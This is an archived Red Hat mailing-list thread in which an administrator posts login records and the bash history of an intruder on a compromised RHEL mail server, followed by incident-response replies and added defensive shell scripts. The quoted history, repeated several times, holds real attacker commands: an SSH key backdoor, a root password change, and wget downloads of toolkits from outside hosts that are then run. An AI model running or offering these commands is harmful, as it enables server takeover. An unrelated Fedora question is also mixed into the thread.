Old 01-28-2010, 05:14 AM
Wahyu Darmawan
 
help

You may change your root password first, and then you can continue to analyze your system.

________________________________________
From: redhat-list-bounces@redhat.com [redhat-list-bounces@redhat.com] On Behalf Of Joy Methew [ml4joy@gmail.com]
Sent: Thursday, January 28, 2010 12:59 PM
To: General Red Hat Linux discussion list
Subject: help

Hello all,
I am using RHEL5.3 as my mail server with a real IP. I configure my system mostly remotely. The last login to my system was on 27 Jan from this IP: 118.129.153.43.
Then I tried to log in on the morning of 28 Jan, but I could not authenticate as root with my last password.
Then I rebooted the system and reset my password.
I logged in as root and ran the "last" command; I am sending the first 10 lines of its output. I think someone hacked my system. I am also sending the history command output.
Now I have removed the .ssh directory and /var/tmp/*.

Please suggest what this is.

thanks

last command output:
root pts/1 117.199.118.234 Thu Jan 28 10:58 still logged in
root pts/0 117.199.118.234 Thu Jan 28 10:49 still logged in
root tty1 Thu Jan 28 10:48 - 10:52 (00:04)
reboot system boot 2.6.18-128.el5PA Thu Jan 28 10:45 (00:25)
root pts/2 165.red-79-153-1 Thu Jan 28 01:42 - 01:52 (00:09)
root pts/2 165.red-79-153-1 Wed Jan 27 23:02 - 01:27 (02:25)
root pts/2 165.red-79-153-1 Wed Jan 27 22:33 - 22:34 (00:00)
root pts/3 165.red-79-153-1 Wed Jan 27 22:32 - 22:33 (00:00)
root pts/2 118.129.153.43 Wed Jan 27 22:31 - 22:32 (00:01)
root pts/2 117.199.114.189 Wed Jan 27 15:47 - 15:51 (00:03)

What is 165.red-79...? This is not my IP.


History Output

115 cat /proc/cpuinfo
116 mkdir .ssh
117 cd .ssh
118 echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
119 cd /var/tmp
120 mkdir " "
121 cd " "
122 passwd
123 echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
124 ps -x
125 cd /var/tmp
126 w
127 wget http://kok.ucoz.de/gosh.tgz
128 tar xvf gosh.tgz
129 cd gosh
130 chmod +x *
131 ./go.sh 121
132 w
133 ps -x
134 ps -aux
135 cd /var/tmp
136 cd " "
137 ls -a
138 wget http://helpbnc.myftp.org/danger/fld.tgz
139 tar xzvf fld.tgz
140 cd fld
141 chmod +x *
142 nano cyc.acc
143 nano cyc.acc.1
144 nano cyc.set
145 ./httpd
146 w
--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@redhat.com?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list

 
Old 01-28-2010, 05:28 AM
Joy Methew
 
help

I have changed my root password.

On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan
<Wahyu.Darmawan@ag-it.com>wrote:

> You may change your root password first, and then you can continue to
> analyze your system.
>
> ________________________________________
> From: redhat-list-bounces@redhat.com [redhat-list-bounces@redhat.com] On
> Behalf Of Joy Methew [ml4joy@gmail.com]
> Sent: Thursday, January 28, 2010 12:59 PM
> To: General Red Hat Linux discussion list
> Subject: help
>
> Hello all,
> I am using RHEL5.3 as my mail server with a real IP. I configure my system mostly remotely. The last login to my system was on 27 Jan from this IP: 118.129.153.43.
> Then I tried to log in on the morning of 28 Jan, but I could not authenticate as root with my last password.
> Then I rebooted the system and reset my password.
> I logged in as root and ran the "last" command; I am sending the first 10 lines of its output. I think someone hacked my system. I am also sending the history command output.
> Now I have removed the .ssh directory and /var/tmp/*.
>
> Please suggest what this is.
>
> Thanks
>
> last command output:
> root pts/1 117.199.118.234 Thu Jan 28 10:58 still logged in
> root pts/0 117.199.118.234 Thu Jan 28 10:49 still logged in
> root tty1 Thu Jan 28 10:48 - 10:52 (00:04)
> reboot system boot 2.6.18-128.el5PA Thu Jan 28 10:45 (00:25)
> root pts/2 165.red-79-153-1 Thu Jan 28 01:42 - 01:52 (00:09)
> root pts/2 165.red-79-153-1 Wed Jan 27 23:02 - 01:27 (02:25)
> root pts/2 165.red-79-153-1 Wed Jan 27 22:33 - 22:34 (00:00)
> root pts/3 165.red-79-153-1 Wed Jan 27 22:32 - 22:33 (00:00)
> root pts/2 118.129.153.43 Wed Jan 27 22:31 - 22:32 (00:01)
> root pts/2 117.199.114.189 Wed Jan 27 15:47 - 15:51 (00:03)
>
> What is 165.red-79...? This is not my IP.
>
>
> History Output
>
> 115 cat /proc/cpuinfo
> 116 mkdir .ssh
> 117 cd .ssh
> 118 echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
> 119 cd /var/tmp
> 120 mkdir " "
> 121 cd " "
> 122 passwd
> 123 echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
> 124 ps -x
> 125 cd /var/tmp
> 126 w
> 127 wget http://kok.ucoz.de/gosh.tgz
> 128 tar xvf gosh.tgz
> 129 cd gosh
> 130 chmod +x *
> 131 ./go.sh 121
> 132 w
> 133 ps -x
> 134 ps -aux
> 135 cd /var/tmp
> 136 cd " "
> 137 ls -a
> 138 wget http://helpbnc.myftp.org/danger/fld.tgz
> 139 tar xzvf fld.tgz
> 140 cd fld
> 141 chmod +x *
> 142 nano cyc.acc
> 143 nano cyc.acc.1
> 144 nano cyc.set
> 145 ./httpd
> 146 w
 
Old 01-28-2010, 05:29 AM
Joy Methew
 
help

I am still wondering how he/she got my password.


On Thu, Jan 28, 2010 at 11:58 AM, Joy Methew <ml4joy@gmail.com> wrote:

> I have changed my root password.
>
>
> On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan <Wahyu.Darmawan@ag-it.com
> > wrote:
>
>> You may change your root password first, and then you can continue to
>> analyze your system.
>>
>> ________________________________________
>> From: redhat-list-bounces@redhat.com [redhat-list-bounces@redhat.com] On
>> Behalf Of Joy Methew [ml4joy@gmail.com]
>> Sent: Thursday, January 28, 2010 12:59 PM
>> To: General Red Hat Linux discussion list
>> Subject: help
>>
>> Hello all,
>> I am using RHEL5.3 as my mail server with a real IP. I configure my system mostly remotely. The last login to my system was on 27 Jan from this IP: 118.129.153.43.
>> Then I tried to log in on the morning of 28 Jan, but I could not authenticate as root with my last password.
>> Then I rebooted the system and reset my password.
>> I logged in as root and ran the "last" command; I am sending the first 10 lines of its output. I think someone hacked my system. I am also sending the history command output.
>> Now I have removed the .ssh directory and /var/tmp/*.
>>
>> Please suggest what this is.
>>
>> Thanks
>>
>> last command output:
>> root pts/1 117.199.118.234 Thu Jan 28 10:58 still logged in
>> root pts/0 117.199.118.234 Thu Jan 28 10:49 still logged in
>> root tty1 Thu Jan 28 10:48 - 10:52 (00:04)
>> reboot system boot 2.6.18-128.el5PA Thu Jan 28 10:45 (00:25)
>> root pts/2 165.red-79-153-1 Thu Jan 28 01:42 - 01:52 (00:09)
>> root pts/2 165.red-79-153-1 Wed Jan 27 23:02 - 01:27 (02:25)
>> root pts/2 165.red-79-153-1 Wed Jan 27 22:33 - 22:34 (00:00)
>> root pts/3 165.red-79-153-1 Wed Jan 27 22:32 - 22:33 (00:00)
>> root pts/2 118.129.153.43 Wed Jan 27 22:31 - 22:32 (00:01)
>> root pts/2 117.199.114.189 Wed Jan 27 15:47 - 15:51 (00:03)
>>
>> What is 165.red-79...? This is not my IP.
>>
>>
>> History Output
>>
>> 115 cat /proc/cpuinfo
>> 116 mkdir .ssh
>> 117 cd .ssh
>> 118 echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
>> 119 cd /var/tmp
>> 120 mkdir " "
>> 121 cd " "
>> 122 passwd
>> 123 echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
>> 124 ps -x
>> 125 cd /var/tmp
>> 126 w
>> 127 wget http://kok.ucoz.de/gosh.tgz
>> 128 tar xvf gosh.tgz
>> 129 cd gosh
>> 130 chmod +x *
>> 131 ./go.sh 121
>> 132 w
>> 133 ps -x
>> 134 ps -aux
>> 135 cd /var/tmp
>> 136 cd " "
>> 137 ls -a
>> 138 wget http://helpbnc.myftp.org/danger/fld.tgz
>> 139 tar xzvf fld.tgz
>> 140 cd fld
>> 141 chmod +x *
>> 142 nano cyc.acc
>> 143 nano cyc.acc.1
>> 144 nano cyc.set
>> 145 ./httpd
>> 146 w
 
Old 01-28-2010, 05:30 AM
Joy Methew
 
help

I use PuTTY for remote login.

On Thu, Jan 28, 2010 at 11:59 AM, Joy Methew <ml4joy@gmail.com> wrote:

> I am still wondering how he/she got my password.
>
>
>
> On Thu, Jan 28, 2010 at 11:58 AM, Joy Methew <ml4joy@gmail.com> wrote:
>
>> I have changed my root password.
>>
>>
>> On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan <
>> Wahyu.Darmawan@ag-it.com> wrote:
>>
>>> You may change your root password first, and then you can continue to
>>> analyze your system.
>>>
>>> ________________________________________
>>> From: redhat-list-bounces@redhat.com [redhat-list-bounces@redhat.com] On
>>> Behalf Of Joy Methew [ml4joy@gmail.com]
>>> Sent: Thursday, January 28, 2010 12:59 PM
>>> To: General Red Hat Linux discussion list
>>> Subject: help
>>>
>>> Hello all,
>>> I am using RHEL5.3 as my mail server with a real IP. I configure my system mostly remotely. The last login to my system was on 27 Jan from this IP: 118.129.153.43.
>>> Then I tried to log in on the morning of 28 Jan, but I could not authenticate as root with my last password.
>>> Then I rebooted the system and reset my password.
>>> I logged in as root and ran the "last" command; I am sending the first 10 lines of its output. I think someone hacked my system. I am also sending the history command output.
>>> Now I have removed the .ssh directory and /var/tmp/*.
>>>
>>> Please suggest what this is.
>>>
>>> Thanks
>>>
>>> last command output:
>>> root pts/1 117.199.118.234 Thu Jan 28 10:58 still logged in
>>> root pts/0 117.199.118.234 Thu Jan 28 10:49 still logged in
>>> root tty1 Thu Jan 28 10:48 - 10:52 (00:04)
>>> reboot system boot 2.6.18-128.el5PA Thu Jan 28 10:45 (00:25)
>>> root pts/2 165.red-79-153-1 Thu Jan 28 01:42 - 01:52 (00:09)
>>> root pts/2 165.red-79-153-1 Wed Jan 27 23:02 - 01:27 (02:25)
>>> root pts/2 165.red-79-153-1 Wed Jan 27 22:33 - 22:34 (00:00)
>>> root pts/3 165.red-79-153-1 Wed Jan 27 22:32 - 22:33 (00:00)
>>> root pts/2 118.129.153.43 Wed Jan 27 22:31 - 22:32 (00:01)
>>> root pts/2 117.199.114.189 Wed Jan 27 15:47 - 15:51 (00:03)
>>>
>>> What is 165.red-79...? This is not my IP.
>>>
>>>
>>> History Output
>>>
>>> 115 cat /proc/cpuinfo
>>> 116 mkdir .ssh
>>> 117 cd .ssh
>>> 118 echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
>>> 119 cd /var/tmp
>>> 120 mkdir " "
>>> 121 cd " "
>>> 122 passwd
>>> 123 echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
>>> 124 ps -x
>>> 125 cd /var/tmp
>>> 126 w
>>> 127 wget http://kok.ucoz.de/gosh.tgz
>>> 128 tar xvf gosh.tgz
>>> 129 cd gosh
>>> 130 chmod +x *
>>> 131 ./go.sh 121
>>> 132 w
>>> 133 ps -x
>>> 134 ps -aux
>>> 135 cd /var/tmp
>>> 136 cd " "
>>> 137 ls -a
>>> 138 wget http://helpbnc.myftp.org/danger/fld.tgz
>>> 139 tar xzvf fld.tgz
>>> 140 cd fld
>>> 141 chmod +x *
>>> 142 nano cyc.acc
>>> 143 nano cyc.acc.1
>>> 144 nano cyc.set
>>> 145 ./httpd
>>> 146 w
 
Old 01-28-2010, 07:14 AM
Bohdan Sydor
 
help

Joy Methew wrote:

> I logged in as root and ran the "last" command; I am sending the first 10 lines of its output. I think someone hacked my system. I am also sending the history command output.
> Now I have removed the .ssh directory and /var/tmp/*.
>
> Please suggest what this is.

Hi,

If your system was compromised, then the most secure next step is to reinstall the system.

From what I can see in the bash history, the attacker downloaded and installed custom software.
Please send the output of the following commands, run as root:

ps aux
pstree
netstat -ntulp
getent passwd

Regards

--
Bohdan Sydor
RHC{E,I,X}
www.sydor.net
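Two helpers for the triage stage Bohdan describes, written as an added example for this thread (not code posted by anyone in it). The first answers Joy's "this is not my IP" question mechanically: it scans `last` output for remote root sessions whose source is not on an allow-list of the administrator's own addresses. The second collects the listings Bohdan asks for into one directory. The allow-list (KNOWN_SOURCES) and the sample `last` lines are constructed for the example; the sample is modelled on the output posted above.

```sh
#!/bin/sh
# Added example, not from the thread: triage helpers for a suspected root compromise.

# Constructed sample, modelled on the `last` output posted in the thread.
SAMPLE_LAST='root pts/1 117.199.118.234 Thu Jan 28 10:58 still logged in
root tty1 Thu Jan 28 10:48 - 10:52 (00:04)
reboot system boot 2.6.18-128.el5PA Thu Jan 28 10:45 (00:25)
root pts/2 165.red-79-153-1 Thu Jan 28 01:42 - 01:52 (00:09)
root pts/2 165.red-79-153-1 Wed Jan 27 23:02 - 01:27 (02:25)
root pts/2 118.129.153.43 Wed Jan 27 22:31 - 22:32 (00:01)'

# Assumption: the administrator keeps a list of the addresses they log in from.
KNOWN_SOURCES='118.129.153.43 117.199.118.234 117.199.114.189'

# unknown_root_logins LAST_OUTPUT KNOWN_SOURCES
# Prints each unknown source host once, followed by its number of root sessions.
# Only pseudo-terminal (pts/*) sessions are considered: console logins (tty1)
# carry no source host, and the "reboot" pseudo-user is skipped.
unknown_root_logins() {
  printf '%s\n' "$1" | awk -v known="$2" '
    BEGIN { n = split(known, k, " "); for (i = 1; i <= n; i++) ok[k[i]] = 1 }
    $1 == "root" && $2 ~ /^pts\// && !($3 in ok) { count[$3]++ }
    END { for (h in count) print h, count[h] }'
}

# triage_snapshot OUTDIR
# Runs the commands Bohdan lists, plus `last -i` (numeric source addresses
# instead of truncated host names), and stores each output in OUTDIR.
# Run as root on the affected host; a missing tool is recorded, not fatal.
triage_snapshot() {
  outdir=$1
  mkdir -p "$outdir"
  for cmd in 'ps aux' 'pstree' 'netstat -ntulp' 'getent passwd' 'last -i'; do
    name=$(printf '%s' "$cmd" | tr ' ' '_')
    if command -v "${cmd%% *}" >/dev/null 2>&1; then
      $cmd > "$outdir/$name.txt" 2>&1
    else
      echo "missing: ${cmd%% *}" >> "$outdir/missing.txt"
    fi
  done
}

# Demonstration on the constructed sample; prints "165.red-79-153-1 2".
unknown_root_logins "$SAMPLE_LAST" "$KNOWN_SOURCES"
```

On a live host, feed the function with `unknown_root_logins "$(last -i)" "$KNOWN_SOURCES"`: plain `last` truncates host names (which is why the thread shows "165.red-79-153-1"), and `-i` prints the address instead. Remember that wtmp is writable by root, so on a box where root was already taken its contents are evidence, not proof; the outputs from triage_snapshot and an off-host copy of the logs are what the reinstall decision should rest on.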

 
Old 01-28-2010, 07:24 AM
Prabhakar Pandey
 
help

I have recently installed Fedora 8 alongside Windows Vista.
I have some problems in Fedora:
1. My time is not showing correctly in Fedora; when I try to change it, the time in Vista changes.
2. Software Updater isn't working correctly: when I try to use it, it hangs and I am unable to do anything.

3. How do I install a movie player and other media players in Fedora?
4. How can I configure yum in Fedora 8?

Thanks
Prabhakar Pandey

--
users mailing list
users@lists.fedoraproject.org
To unsubscribe or change subscription options:
https://admin.fedoraproject.org/mailman/listinfo/users
Guidelines: http://fedoraproject.org/wiki/Communicate/MailingListGuidelines
 
Old 01-28-2010, 11:08 AM
"Marti, Robert"
 
help

Yes you were hacked. Hope you have backups because you should reinstall.

Sent from my iPhone

On Jan 28, 2010, at 0:11, "Joy Methew" <ml4joy@gmail.com> wrote:

> Hello all,
> I am using RHEL5.3 as my mail server with a real IP. I configure my system mostly remotely. The last login to my system was on 27 Jan from this IP: 118.129.153.43.
> Then I tried to log in on the morning of 28 Jan, but I could not authenticate as root with my last password.
> Then I rebooted the system and reset my password.
> I logged in as root and ran the "last" command; I am sending the first 10 lines of its output. I think someone hacked my system. I am also sending the history command output.
> Now I have removed the .ssh directory and /var/tmp/*.
>
> Please suggest what this is.
>
> Thanks
>
> last command output:
> root pts/1 117.199.118.234 Thu Jan 28 10:58 still logged in
> root pts/0 117.199.118.234 Thu Jan 28 10:49 still logged in
> root tty1 Thu Jan 28 10:48 - 10:52 (00:04)
> reboot system boot 2.6.18-128.el5PA Thu Jan 28 10:45 (00:25)
> root pts/2 165.red-79-153-1 Thu Jan 28 01:42 - 01:52 (00:09)
> root pts/2 165.red-79-153-1 Wed Jan 27 23:02 - 01:27 (02:25)
> root pts/2 165.red-79-153-1 Wed Jan 27 22:33 - 22:34 (00:00)
> root pts/3 165.red-79-153-1 Wed Jan 27 22:32 - 22:33 (00:00)
> root pts/2 118.129.153.43 Wed Jan 27 22:31 - 22:32 (00:01)
> root pts/2 117.199.114.189 Wed Jan 27 15:47 - 15:51 (00:03)
>
> What is 165.red-79...? This is not my IP.
>
>
> History Output
>
> 115 cat /proc/cpuinfo
> 116 mkdir .ssh
> 117 cd .ssh
> 118 echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
> 119 cd /var/tmp
> 120 mkdir " "
> 121 cd " "
> 122 passwd
> 123 echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
> 124 ps -x
> 125 cd /var/tmp
> 126 w
> 127 wget http://kok.ucoz.de/gosh.tgz
> 128 tar xvf gosh.tgz
> 129 cd gosh
> 130 chmod +x *
> 131 ./go.sh 121
> 132 w
> 133 ps -x
> 134 ps -aux
> 135 cd /var/tmp
> 136 cd " "
> 137 ls -a
> 138 wget http://helpbnc.myftp.org/danger/fld.tgz
> 139 tar xzvf fld.tgz
> 140 cd fld
> 141 chmod +x *
> 142 nano cyc.acc
> 143 nano cyc.acc.1
> 144 nano cyc.set
> 145 ./httpd
> 146 w
 
Old 01-28-2010, 11:11 AM
"Marti, Robert"
 
help

Brute force attacks. Leaving root ssh open to the world is begging to be owned like this. Always turn that off or use key-only auth for root on Internet-facing boxes.

Sent from my iPhone

On Jan 28, 2010, at 0:33, "Joy Methew" <ml4joy@gmail.com> wrote:

> I am still wondering how he/she got my password.
>
>
> On Thu, Jan 28, 2010 at 11:58 AM, Joy Methew <ml4joy@gmail.com> wrote:
>
>> I have changed my root password.
>>
>>
>> On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan <Wahyu.Darmawan@ag-it.com
>>> wrote:
>>
>>> You may change your root password first, and then you can continue to analyze your system.
>>>
>>> ________________________________________
>>> From: redhat-list-bounces@redhat.com [redhat-list-
>>> bounces@redhat.com] On
>>> Behalf Of Joy Methew [ml4joy@gmail.com]
>>> Sent: Thursday, January 28, 2010 12:59 PM
>>> To: General Red Hat Linux discussion list
>>> Subject: help
>>>
>>> Hello all,
>>> I am using RHEL5.3 as my mail server with a real IP. I configure my system mostly remotely. The last login to my system was on 27 Jan from this IP: 118.129.153.43.
>>> Then I tried to log in on the morning of 28 Jan, but I could not authenticate as root with my last password.
>>> Then I rebooted the system and reset my password.
>>> I logged in as root and ran the "last" command; I am sending the first 10 lines of its output. I think someone hacked my system. I am also sending the history command output.
>>> Now I have removed the .ssh directory and /var/tmp/*.
>>>
>>> Please suggest what this is.
>>>
>>> Thanks
>>>
>>> last command output:
>>> root pts/1 117.199.118.234 Thu Jan 28 10:58 still logged in
>>> root pts/0 117.199.118.234 Thu Jan 28 10:49 still logged in
>>> root tty1 Thu Jan 28 10:48 - 10:52 (00:04)
>>> reboot system boot 2.6.18-128.el5PA Thu Jan 28 10:45 (00:25)
>>> root pts/2 165.red-79-153-1 Thu Jan 28 01:42 - 01:52 (00:09)
>>> root pts/2 165.red-79-153-1 Wed Jan 27 23:02 - 01:27 (02:25)
>>> root pts/2 165.red-79-153-1 Wed Jan 27 22:33 - 22:34 (00:00)
>>> root pts/3 165.red-79-153-1 Wed Jan 27 22:32 - 22:33 (00:00)
>>> root pts/2 118.129.153.43 Wed Jan 27 22:31 - 22:32 (00:01)
>>> root pts/2 117.199.114.189 Wed Jan 27 15:47 - 15:51 (00:03)
>>>
>>> What is 165.red-79...? This is not my IP.
>>>
>>>
>>> History Output
>>>
>>> 115 cat /proc/cpuinfo
>>> 116 mkdir .ssh
>>> 117 cd .ssh
>>> 118 echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
>>> 119 cd /var/tmp
>>> 120 mkdir " "
>>> 121 cd " "
>>> 122 passwd
>>> 123 echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
>>> 124 ps -x
>>> 125 cd /var/tmp
>>> 126 w
>>> 127 wget http://kok.ucoz.de/gosh.tgz
>>> 128 tar xvf gosh.tgz
>>> 129 cd gosh
>>> 130 chmod +x *
>>> 131 ./go.sh 121
>>> 132 w
>>> 133 ps -x
>>> 134 ps -aux
>>> 135 cd /var/tmp
>>> 136 cd " "
>>> 137 ls -a
>>> 138 wget http://helpbnc.myftp.org/danger/fld.tgz
>>> 139 tar xzvf fld.tgz
>>> 140 cd fld
>>> 141 chmod +x *
>>> 142 nano cyc.acc
>>> 143 nano cyc.acc.1
>>> 144 nano cyc.set
>>> 145 ./httpd
>>> 146 w
 
Old 01-28-2010, 11:50 AM
mark
 
help

Joy Methew wrote:

Hello all,
I am using RHEL5.3 as my mail server with a real IP. I configure my system mostly remotely. The last login to my system was on 27 Jan from this IP: 118.129.153.43.
Then I tried to log in on the morning of 28 Jan, but I could not authenticate as root with my last password.
Then I rebooted the system and reset my password.
I logged in as root and ran the "last" command; I am sending the first 10 lines of its output. I think someone hacked my system. I am also sending the history command output.
Now I have removed the .ssh directory and /var/tmp/*.

Please suggest what this is.

<snip>

Copy your /root/.ssh/authorized_keys to a backup name, and edit the existing
one to remove the last one or two, but REMOVE THE KEY YOU SEE IN THERE THAT
MATCHES THE ONE IN THE ECHO COMMAND. Otherwise, your attacker will just get in
*without* a password, just an exchange of public and private keys via ssh.


mark
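The two remediation steps recommended in this thread, as an added example (not code from mark, Robert or anyone else in the thread): mark's "copy authorized_keys to a backup name and remove the key that matches the echo command", and Robert's earlier "turn root ssh off or use key-only auth for root". remove_key matches the key blob as a whole field, so a line that carries a leading options field (such as command="...") is caught as well; audit_sshd_config reads sshd_config the way sshd does (first occurrence of a keyword wins, commented lines ignored) and reports whether root is still reachable by password guessing. The file contents, paths and key blobs in the demonstration are constructed; the "both default to yes" assumption for absent keywords matches OpenSSH of the RHEL 5 era and should be confirmed with `sshd -T` on newer systems.

```sh
#!/bin/sh
# Added example, not from the thread: strip an attacker's key from
# authorized_keys and audit sshd_config for root password logins.

# remove_key FILE KEYBLOB
# Backs FILE up to FILE.bak.<timestamp>, then rewrites it without every line
# that contains KEYBLOB as a whole field. Prints the number of lines removed.
remove_key() {
  file=$1 blob=$2
  cp -p "$file" "$file.bak.$(date +%Y%m%d%H%M%S)"
  tmp=$(mktemp)
  before=$(awk 'END { print NR }' "$file")
  awk -v blob="$blob" '
    { for (i = 1; i <= NF; i++) if ($i == blob) next; print }' "$file" > "$tmp"
  after=$(awk 'END { print NR }' "$tmp")
  cat "$tmp" > "$file"   # write through the existing inode: owner and mode survive
  rm -f "$tmp"
  chmod 600 "$file"
  echo $((before - after))
}

# first_value FILE KEYWORD DEFAULT
# sshd uses the first occurrence of a keyword; a commented line never matches
# because its first field begins with '#'. KEYWORD is given in lower case.
first_value() {
  awk -v key="$2" -v def="$3" '
    tolower($1) == key && !seen { v = $2; seen = 1 }
    END { print (seen ? v : def) }' "$1"
}

# audit_sshd_config FILE
# Returns 0 when root cannot be reached by password guessing over ssh and
# 1 otherwise, printing the finding. Assumption: absent keywords default to
# "yes" (PermitRootLogin and PasswordAuthentication), as in OpenSSH of that era.
audit_sshd_config() {
  prl=$(first_value "$1" permitrootlogin yes)
  pwa=$(first_value "$1" passwordauthentication yes)
  if [ "$prl" = yes ]; then
    if [ "$pwa" = yes ]; then
      echo "root password logins are open to the network: set PermitRootLogin no (or without-password for key-only root)"
    else
      echo "PermitRootLogin yes: prefer no, or without-password for key-only root"
    fi
    return 1
  fi
  return 0
}

# Demonstration on constructed files in a scratch directory.
DEMO=$(mktemp -d)
printf '%s\n' \
  'ssh-rsa AAAAexampleADMIN admin@workstation' \
  'ssh-rsa AAAAexampleBAD rsa-key-20080201' \
  'command="/bin/true" ssh-rsa AAAAexampleBAD again' > "$DEMO/authorized_keys"
printf 'PermitRootLogin yes\nPasswordAuthentication yes\n' > "$DEMO/sshd_config.weak"
printf 'PermitRootLogin without-password\nPasswordAuthentication no\n' > "$DEMO/sshd_config.ok"

echo "removed $(remove_key "$DEMO/authorized_keys" AAAAexampleBAD) line(s)"   # removed 2 line(s)
audit_sshd_config "$DEMO/sshd_config.weak" || echo "weak config: $DEMO/sshd_config.weak"
audit_sshd_config "$DEMO/sshd_config.ok" && echo "hardened config: ok"
```

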